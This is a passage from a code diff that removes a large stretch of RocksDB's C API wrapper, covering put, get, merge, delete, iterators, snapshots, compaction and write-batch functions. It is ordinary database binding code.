-  rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t;
-  SaveError(errptr,
-      db->rep->CreateColumnFamily(ColumnFamilyOptions(column_family_options->rep),
-        std::string(column_family_name), &(handle->rep)));
-  return handle;
-}
-
-void rocksdb_drop_column_family(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* handle,
-    char** errptr) {
-  SaveError(errptr, db->rep->DropColumnFamily(handle->rep));
-}
-
-void rocksdb_column_family_handle_destroy(rocksdb_column_family_handle_t* handle) {
-  delete handle->rep;
-  delete handle;
-}
-
-void rocksdb_put(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Put(options->rep, Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_put_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Put(options->rep, column_family->rep,
-              Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_delete(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    char** errptr) {
-  SaveError(errptr, db->rep->Delete(options->rep, Slice(key, keylen)));
-}
-
-void rocksdb_delete_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    char** errptr) {
-  SaveError(errptr, db->rep->Delete(options->rep, column_family->rep,
-        Slice(key, keylen)));
-}
-
-void rocksdb_merge(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Merge(options->rep, Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_merge_cf(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    const char* val, size_t vallen,
-    char** errptr) {
-  SaveError(errptr,
-            db->rep->Merge(options->rep, column_family->rep,
-              Slice(key, keylen), Slice(val, vallen)));
-}
-
-void rocksdb_write(
-    rocksdb_t* db,
-    const rocksdb_writeoptions_t* options,
-    rocksdb_writebatch_t* batch,
-    char** errptr) {
-  SaveError(errptr, db->rep->Write(options->rep, &batch->rep));
-}
-
-char* rocksdb_get(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = db->rep->Get(options->rep, Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-char* rocksdb_get_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t keylen,
-    size_t* vallen,
-    char** errptr) {
-  char* result = nullptr;
-  std::string tmp;
-  Status s = db->rep->Get(options->rep, column_family->rep,
-      Slice(key, keylen), &tmp);
-  if (s.ok()) {
-    *vallen = tmp.size();
-    result = CopyString(tmp);
-  } else {
-    *vallen = 0;
-    if (!s.IsNotFound()) {
-      SaveError(errptr, s);
-    }
-  }
-  return result;
-}
-
-void rocksdb_multi_get(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes,
-    char** errs) {
-  std::vector<Slice> keys(num_keys);
-  for (size_t i = 0; i < num_keys; i++) {
-    keys[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<std::string> values(num_keys);
-  std::vector<Status> statuses = db->rep->MultiGet(options->rep, keys, &values);
-  for (size_t i = 0; i < num_keys; i++) {
-    if (statuses[i].ok()) {
-      values_list[i] = CopyString(values[i]);
-      values_list_sizes[i] = values[i].size();
-      errs[i] = nullptr;
-    } else {
-      values_list[i] = nullptr;
-      values_list_sizes[i] = 0;
-      if (!statuses[i].IsNotFound()) {
-        errs[i] = strdup(statuses[i].ToString().c_str());
-      } else {
-        errs[i] = nullptr;
-      }
-    }
-  }
-}
-
-void rocksdb_multi_get_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    const rocksdb_column_family_handle_t* const* column_families,
-    size_t num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    char** values_list, size_t* values_list_sizes,
-    char** errs) {
-  std::vector<Slice> keys(num_keys);
-  std::vector<ColumnFamilyHandle*> cfs(num_keys);
-  for (size_t i = 0; i < num_keys; i++) {
-    keys[i] = Slice(keys_list[i], keys_list_sizes[i]);
-    cfs[i] = column_families[i]->rep;
-  }
-  std::vector<std::string> values(num_keys);
-  std::vector<Status> statuses = db->rep->MultiGet(options->rep, cfs, keys, &values);
-  for (size_t i = 0; i < num_keys; i++) {
-    if (statuses[i].ok()) {
-      values_list[i] = CopyString(values[i]);
-      values_list_sizes[i] = values[i].size();
-      errs[i] = nullptr;
-    } else {
-      values_list[i] = nullptr;
-      values_list_sizes[i] = 0;
-      if (!statuses[i].IsNotFound()) {
-        errs[i] = strdup(statuses[i].ToString().c_str());
-      } else {
-        errs[i] = nullptr;
-      }
-    }
-  }
-}
-
-rocksdb_iterator_t* rocksdb_create_iterator(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = db->rep->NewIterator(options->rep);
-  return result;
-}
-
-rocksdb_iterator_t* rocksdb_create_iterator_cf(
-    rocksdb_t* db,
-    const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family) {
-  rocksdb_iterator_t* result = new rocksdb_iterator_t;
-  result->rep = db->rep->NewIterator(options->rep, column_family->rep);
-  return result;
-}
-
-void rocksdb_create_iterators(
-    rocksdb_t *db,
-    rocksdb_readoptions_t* opts,
-    rocksdb_column_family_handle_t** column_families,
-    rocksdb_iterator_t** iterators,
-    size_t size,
-    char** errptr) {
-  std::vector<ColumnFamilyHandle*> column_families_vec;
-  for (size_t i = 0; i < size; i++) {
-    column_families_vec.push_back(column_families[i]->rep);
-  }
-
-  std::vector<Iterator*> res;
-  Status status = db->rep->NewIterators(opts->rep, column_families_vec, &res);
-  assert(res.size() == size);
-  if (SaveError(errptr, status)) {
-    return;
-  }
-
-  for (size_t i = 0; i < size; i++) {
-    iterators[i] = new rocksdb_iterator_t;
-    iterators[i]->rep = res[i];
-  }
-}
-
-const rocksdb_snapshot_t* rocksdb_create_snapshot(
-    rocksdb_t* db) {
-  rocksdb_snapshot_t* result = new rocksdb_snapshot_t;
-  result->rep = db->rep->GetSnapshot();
-  return result;
-}
-
-void rocksdb_release_snapshot(
-    rocksdb_t* db,
-    const rocksdb_snapshot_t* snapshot) {
-  db->rep->ReleaseSnapshot(snapshot->rep);
-  delete snapshot;
-}
-
-char* rocksdb_property_value(
-    rocksdb_t* db,
-    const char* propname) {
-  std::string tmp;
-  if (db->rep->GetProperty(Slice(propname), &tmp)) {
-    // We use strdup() since we expect human readable output.
-    return strdup(tmp.c_str());
-  } else {
-    return nullptr;
-  }
-}
-
-int rocksdb_property_int(
-    rocksdb_t* db,
-    const char* propname,
-    uint64_t *out_val) {
-  if (db->rep->GetIntProperty(Slice(propname), out_val)) {
-    return 0;
-  } else {
-    return -1;
-  }
-}
-
-char* rocksdb_property_value_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    const char* propname) {
-  std::string tmp;
-  if (db->rep->GetProperty(column_family->rep, Slice(propname), &tmp)) {
-    // We use strdup() since we expect human readable output.
-    return strdup(tmp.c_str());
-  } else {
-    return nullptr;
-  }
-}
-
-void rocksdb_approximate_sizes(
-    rocksdb_t* db,
-    int num_ranges,
-    const char* const* range_start_key, const size_t* range_start_key_len,
-    const char* const* range_limit_key, const size_t* range_limit_key_len,
-    uint64_t* sizes) {
-  Range* ranges = new Range[num_ranges];
-  for (int i = 0; i < num_ranges; i++) {
-    ranges[i].start = Slice(range_start_key[i], range_start_key_len[i]);
-    ranges[i].limit = Slice(range_limit_key[i], range_limit_key_len[i]);
-  }
-  db->rep->GetApproximateSizes(ranges, num_ranges, sizes);
-  delete[] ranges;
-}
-
-void rocksdb_approximate_sizes_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    int num_ranges,
-    const char* const* range_start_key, const size_t* range_start_key_len,
-    const char* const* range_limit_key, const size_t* range_limit_key_len,
-    uint64_t* sizes) {
-  Range* ranges = new Range[num_ranges];
-  for (int i = 0; i < num_ranges; i++) {
-    ranges[i].start = Slice(range_start_key[i], range_start_key_len[i]);
-    ranges[i].limit = Slice(range_limit_key[i], range_limit_key_len[i]);
-  }
-  db->rep->GetApproximateSizes(column_family->rep, ranges, num_ranges, sizes);
-  delete[] ranges;
-}
-
-void rocksdb_delete_file(
-    rocksdb_t* db,
-    const char* name) {
-  db->rep->DeleteFile(name);
-}
-
-const rocksdb_livefiles_t* rocksdb_livefiles(
-    rocksdb_t* db) {
-  rocksdb_livefiles_t* result = new rocksdb_livefiles_t;
-  db->rep->GetLiveFilesMetaData(&result->rep);
-  return result;
-}
-
-void rocksdb_compact_range(
-    rocksdb_t* db,
-    const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      CompactRangeOptions(),
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_cf(
-    rocksdb_t* db,
-    rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len,
-    const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      CompactRangeOptions(), column_family->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_opt(rocksdb_t* db, rocksdb_compactoptions_t* opt,
-                               const char* start_key, size_t start_key_len,
-                               const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      opt->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_compact_range_cf_opt(rocksdb_t* db,
-                                  rocksdb_column_family_handle_t* column_family,
-                                  rocksdb_compactoptions_t* opt,
-                                  const char* start_key, size_t start_key_len,
-                                  const char* limit_key, size_t limit_key_len) {
-  Slice a, b;
-  db->rep->CompactRange(
-      opt->rep, column_family->rep,
-      // Pass nullptr Slice if corresponding "const char*" is nullptr
-      (start_key ? (a = Slice(start_key, start_key_len), &a) : nullptr),
-      (limit_key ? (b = Slice(limit_key, limit_key_len), &b) : nullptr));
-}
-
-void rocksdb_flush(
-    rocksdb_t* db,
-    const rocksdb_flushoptions_t* options,
-    char** errptr) {
-  SaveError(errptr, db->rep->Flush(options->rep));
-}
-
-void rocksdb_disable_file_deletions(
-    rocksdb_t* db,
-    char** errptr) {
-  SaveError(errptr, db->rep->DisableFileDeletions());
-}
-
-void rocksdb_enable_file_deletions(
-    rocksdb_t* db,
-    unsigned char force,
-    char** errptr) {
-  SaveError(errptr, db->rep->EnableFileDeletions(force));
-}
-
-void rocksdb_destroy_db(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  SaveError(errptr, DestroyDB(name, options->rep));
-}
-
-void rocksdb_repair_db(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  SaveError(errptr, RepairDB(name, options->rep));
-}
-
-void rocksdb_iter_destroy(rocksdb_iterator_t* iter) {
-  delete iter->rep;
-  delete iter;
-}
-
-unsigned char rocksdb_iter_valid(const rocksdb_iterator_t* iter) {
-  return iter->rep->Valid();
-}
-
-void rocksdb_iter_seek_to_first(rocksdb_iterator_t* iter) {
-  iter->rep->SeekToFirst();
-}
-
-void rocksdb_iter_seek_to_last(rocksdb_iterator_t* iter) {
-  iter->rep->SeekToLast();
-}
-
-void rocksdb_iter_seek(rocksdb_iterator_t* iter, const char* k, size_t klen) {
-  iter->rep->Seek(Slice(k, klen));
-}
-
-void rocksdb_iter_seek_for_prev(rocksdb_iterator_t* iter, const char* k,
-                                size_t klen) {
-  iter->rep->SeekForPrev(Slice(k, klen));
-}
-
-void rocksdb_iter_next(rocksdb_iterator_t* iter) {
-  iter->rep->Next();
-}
-
-void rocksdb_iter_prev(rocksdb_iterator_t* iter) {
-  iter->rep->Prev();
-}
-
-const char* rocksdb_iter_key(const rocksdb_iterator_t* iter, size_t* klen) {
-  Slice s = iter->rep->key();
-  *klen = s.size();
-  return s.data();
-}
-
-const char* rocksdb_iter_value(const rocksdb_iterator_t* iter, size_t* vlen) {
-  Slice s = iter->rep->value();
-  *vlen = s.size();
-  return s.data();
-}
-
-void rocksdb_iter_get_error(const rocksdb_iterator_t* iter, char** errptr) {
-  SaveError(errptr, iter->rep->status());
-}
-
-rocksdb_writebatch_t* rocksdb_writebatch_create() {
-  return new rocksdb_writebatch_t;
-}
-
-rocksdb_writebatch_t* rocksdb_writebatch_create_from(const char* rep,
-                                                     size_t size) {
-  rocksdb_writebatch_t* b = new rocksdb_writebatch_t;
-  b->rep = WriteBatch(std::string(rep, size));
-  return b;
-}
-
-void rocksdb_writebatch_destroy(rocksdb_writebatch_t* b) {
-  delete b;
-}
-
-void rocksdb_writebatch_clear(rocksdb_writebatch_t* b) {
-  b->rep.Clear();
-}
-
-int rocksdb_writebatch_count(rocksdb_writebatch_t* b) {
-  return b->rep.Count();
-}
-
-void rocksdb_writebatch_put(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Put(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_put_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Put(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_putv(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Put(SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_putv_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Put(column_family->rep, SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_merge(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Merge(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_merge_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep.Merge(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_mergev(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Merge(SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_mergev_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep.Merge(column_family->rep, SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_delete(
-    rocksdb_writebatch_t* b,
-    const char* key, size_t klen) {
-  b->rep.Delete(Slice(key, klen));
-}
-
-void rocksdb_writebatch_delete_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen) {
-  b->rep.Delete(column_family->rep, Slice(key, klen));
-}
-
-void rocksdb_writebatch_deletev(
-    rocksdb_writebatch_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep.Delete(SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_deletev_cf(
-    rocksdb_writebatch_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep.Delete(column_family->rep, SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_delete_range(rocksdb_writebatch_t* b,
-                                     const char* start_key,
-                                     size_t start_key_len, const char* end_key,
-                                     size_t end_key_len) {
-  b->rep.DeleteRange(Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_delete_range_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len) {
-  b->rep.DeleteRange(column_family->rep, Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_delete_rangev(rocksdb_writebatch_t* b, int num_keys,
-                                      const char* const* start_keys_list,
-                                      const size_t* start_keys_list_sizes,
-                                      const char* const* end_keys_list,
-                                      const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep.DeleteRange(SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_delete_rangev_cf(
-    rocksdb_writebatch_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep.DeleteRange(column_family->rep,
-                     SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_put_log_data(
-    rocksdb_writebatch_t* b,
-    const char* blob, size_t len) {
-  b->rep.PutLogData(Slice(blob, len));
-}
-
-void rocksdb_writebatch_iterate(
-    rocksdb_writebatch_t* b,
-    void* state,
-    void (*put)(void*, const char* k, size_t klen, const char* v, size_t vlen),
-    void (*deleted)(void*, const char* k, size_t klen)) {
-  class H : public WriteBatch::Handler {
-   public:
-    void* state_;
-    void (*put_)(void*, const char* k, size_t klen, const char* v, size_t vlen);
-    void (*deleted_)(void*, const char* k, size_t klen);
-    virtual void Put(const Slice& key, const Slice& value) override {
-      (*put_)(state_, key.data(), key.size(), value.data(), value.size());
-    }
-    virtual void Delete(const Slice& key) override {
-      (*deleted_)(state_, key.data(), key.size());
-    }
-  };
-  H handler;
-  handler.state_ = state;
-  handler.put_ = put;
-  handler.deleted_ = deleted;
-  b->rep.Iterate(&handler);
-}
-
-const char* rocksdb_writebatch_data(rocksdb_writebatch_t* b, size_t* size) {
-  *size = b->rep.GetDataSize();
-  return b->rep.Data().c_str();
-}
-
-void rocksdb_writebatch_set_save_point(rocksdb_writebatch_t* b) {
-  b->rep.SetSavePoint();
-}
-
-void rocksdb_writebatch_rollback_to_save_point(rocksdb_writebatch_t* b,
-                                               char** errptr) {
-  SaveError(errptr, b->rep.RollbackToSavePoint());
-}
-
-void rocksdb_writebatch_pop_save_point(rocksdb_writebatch_t* b, char** errptr) {
-  SaveError(errptr, b->rep.PopSavePoint());
-}
-
-rocksdb_writebatch_wi_t* rocksdb_writebatch_wi_create(size_t reserved_bytes, unsigned char overwrite_key) {
-  rocksdb_writebatch_wi_t* b = new rocksdb_writebatch_wi_t;
-  b->rep = new WriteBatchWithIndex(BytewiseComparator(), reserved_bytes, overwrite_key);
-  return b;
-}
-
-void rocksdb_writebatch_wi_destroy(rocksdb_writebatch_wi_t* b) {
-  if (b->rep) {
-    delete b->rep;
-  }
-  delete b;
-}
-
-void rocksdb_writebatch_wi_clear(rocksdb_writebatch_wi_t* b) {
-  b->rep->Clear();
-}
-
-int rocksdb_writebatch_wi_count(rocksdb_writebatch_wi_t* b) {
-  return b->rep->GetWriteBatch()->Count();
-}
-
-void rocksdb_writebatch_wi_put(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Put(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_put_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Put(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_putv(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Put(SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_putv_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Put(column_family->rep, SliceParts(key_slices.data(), num_keys),
-             SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_merge(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Merge(Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_merge_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen,
-    const char* val, size_t vlen) {
-  b->rep->Merge(column_family->rep, Slice(key, klen), Slice(val, vlen));
-}
-
-void rocksdb_writebatch_wi_mergev(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Merge(SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_mergev_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes,
-    int num_values, const char* const* values_list,
-    const size_t* values_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  std::vector<Slice> value_slices(num_values);
-  for (int i = 0; i < num_values; i++) {
-    value_slices[i] = Slice(values_list[i], values_list_sizes[i]);
-  }
-  b->rep->Merge(column_family->rep, SliceParts(key_slices.data(), num_keys),
-               SliceParts(value_slices.data(), num_values));
-}
-
-void rocksdb_writebatch_wi_delete(
-    rocksdb_writebatch_wi_t* b,
-    const char* key, size_t klen) {
-  b->rep->Delete(Slice(key, klen));
-}
-
-void rocksdb_writebatch_wi_delete_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    const char* key, size_t klen) {
-  b->rep->Delete(column_family->rep, Slice(key, klen));
-}
-
-void rocksdb_writebatch_wi_deletev(
-    rocksdb_writebatch_wi_t* b,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep->Delete(SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_deletev_cf(
-    rocksdb_writebatch_wi_t* b,
-    rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* keys_list,
-    const size_t* keys_list_sizes) {
-  std::vector<Slice> key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    key_slices[i] = Slice(keys_list[i], keys_list_sizes[i]);
-  }
-  b->rep->Delete(column_family->rep, SliceParts(key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_delete_range(rocksdb_writebatch_wi_t* b,
-                                     const char* start_key,
-                                     size_t start_key_len, const char* end_key,
-                                     size_t end_key_len) {
-  b->rep->DeleteRange(Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_wi_delete_range_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    const char* start_key, size_t start_key_len, const char* end_key,
-    size_t end_key_len) {
-  b->rep->DeleteRange(column_family->rep, Slice(start_key, start_key_len),
-                     Slice(end_key, end_key_len));
-}
-
-void rocksdb_writebatch_wi_delete_rangev(rocksdb_writebatch_wi_t* b, int num_keys,
-                                      const char* const* start_keys_list,
-                                      const size_t* start_keys_list_sizes,
-                                      const char* const* end_keys_list,
-                                      const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
-  std::vector<Slice> end_key_slices(num_keys);
-  for (int i = 0; i < num_keys; i++) {
-    start_key_slices[i] = Slice(start_keys_list[i], start_keys_list_sizes[i]);
-    end_key_slices[i] = Slice(end_keys_list[i], end_keys_list_sizes[i]);
-  }
-  b->rep->DeleteRange(SliceParts(start_key_slices.data(), num_keys),
-                     SliceParts(end_key_slices.data(), num_keys));
-}
-
-void rocksdb_writebatch_wi_delete_rangev_cf(
-    rocksdb_writebatch_wi_t* b, rocksdb_column_family_handle_t* column_family,
-    int num_keys, const char* const* start_keys_list,
-    const size_t* start_keys_list_sizes, const char* const* end_keys_list,
-    const size_t* end_keys_list_sizes) {
-  std::vector<Slice> start_key_slices(num_keys);
